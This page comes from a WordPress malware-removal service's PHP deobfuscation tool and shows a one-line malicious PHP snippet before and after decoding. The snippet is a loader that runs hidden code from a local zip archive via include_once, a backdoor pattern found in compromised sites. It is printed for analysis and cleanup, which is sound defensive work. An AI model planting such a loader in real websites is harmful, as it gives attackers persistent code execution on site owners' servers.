Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $h = str_ireplace("www.","",$_SERVER["HTTP_HOST"]);if(!empty($h)){$h="fRkGzs";include_once "zip://xPOpGS#".$h;}?>...



Obfuscated php code

<?php $h = str_ireplace("www.","",$_SERVER["HTTP_HOST"]);if(!empty($h)){$h="fRkGzs";include_once "zip://xPOpGS#".$h;}?>

Decoded(de-Obfuscated) php code

<?php

$h = str_ireplace("www.", "", $_SERVER["HTTP_HOST"]);
if (!empty($h)) {
    $h = "fRkGzs";
    include_once "zip://xPOpGS#fRkGzs";
}


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.